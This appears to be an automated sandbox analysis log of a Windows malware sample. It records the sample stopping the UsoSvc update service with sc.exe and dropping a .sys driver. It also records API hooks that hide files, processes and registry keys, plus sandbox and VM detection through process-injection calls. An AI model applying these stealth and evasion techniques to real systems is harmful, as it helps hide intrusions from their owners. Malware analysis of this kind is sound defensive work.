            Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\lwouyklykeoh.sysJump to dropped file
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hooks files or directories query functions (used to hide files and directories)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Hooks processes query functions (used to hide processes)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Contains functionality to compare user and computer (likely to detect sandboxes)
            Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
            Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,63_2_00000001400010C0
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
